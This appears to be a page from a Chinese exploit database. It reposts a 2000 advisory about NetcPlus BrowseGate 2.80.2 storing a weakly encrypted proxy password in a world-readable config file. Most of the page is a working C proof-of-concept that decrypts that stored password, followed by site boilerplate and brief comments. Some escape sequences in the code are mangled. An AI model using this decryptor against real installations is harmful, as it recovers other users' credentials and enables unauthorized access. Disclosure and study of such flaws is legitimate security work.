NetcPlus BrowseGate 2.80.2 – Weak Encryption
漏洞ID | 1053482 | 漏洞类型 | |
发布时间 | 2000-11-18 | 更新时间 | 2000-11-18 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/1964/info
BrowseGate is a proxy server which supports most standard protocols.
A design error exists in BrowseGate which enables an authenticated user to view other users encrypted passwords. BrowseGate by default intalls in the C:ProgramFilesbrowsegate/ directory and includes a configuration file called brwgate.ini. This file is accessible by all Windows authenticated users and contains the encrypted password. The password is presented in the 'scrnsze' field. However due to a weak encryption scheme it is possible for a user to decrypt the password using a third party utility.
Successful exploitation of this vulnerability will lead to unauthorized access to private data.
*/
/* This is proof of concept code for decrypting password from BrowseGate =
by NetCplus */
#include <stdio.h>
int main() {
unsigned char start[8] = { 0x27, 0x41, 0x72, 0x4a, 0x47, 0x75, 0x4b, =
0x3a };
unsigned char hash[8] = { '%', '}', 'S', 'p', '%', 'g', 'Z', '(' } ;
/* Enter the encrypted password into hash above */
unsigned char except[8] = { '~', ':', 'k', 'C', '@', 'n', 'D', '3' };
unsigned char ex_order[7] = { 't', 'm', 'O', 'L', 's', 'B', 'R' };
unsigned char pass[8];
unsigned char i;
unsigned char range;
if(hash[0] >= '!' && hash[0] <= '&')
hash[0]=(hash[0] - 0x20) + 0x7e;
for(i=0;i<8;i++) {
if(hash[i] >= except[i] && hash[i] <= (except[i] + 6) ) {
pass[i]=ex_order[ (hash[i] - except[i]) ]; }
else {
if(hash[i] < start[i]) {
hash[i]+=0x5e;
}
pass[i]=hash[i] - start[i] + '!';
if(pass[i] >= 'B')
pass[i]+=1;
if(pass[i] >= 'L')
pass[i]+=1;
if(pass[i] >= 'O')
pass[i]+=1;
if(pass[i] >= 'R')
pass[i]+=1;
if(pass[i] >= 'm')
pass[i]+=1;
if(pass[i] >= 's')
pass[i]+=1;
if(pass[i] >= 't')
pass[i]+=1;
}
}
printf("The password is:nt");
for(i=0;i<8;i++) {
printf("%c ", pass[i]);
}
printf("n");
return 0;
}
相关推荐: NT Login Request Size Mismatch DoS Vulnerability
NT Login Request Size Mismatch DoS Vulnerability 漏洞ID 1104963 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 1998-02-14 更新时间 1…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666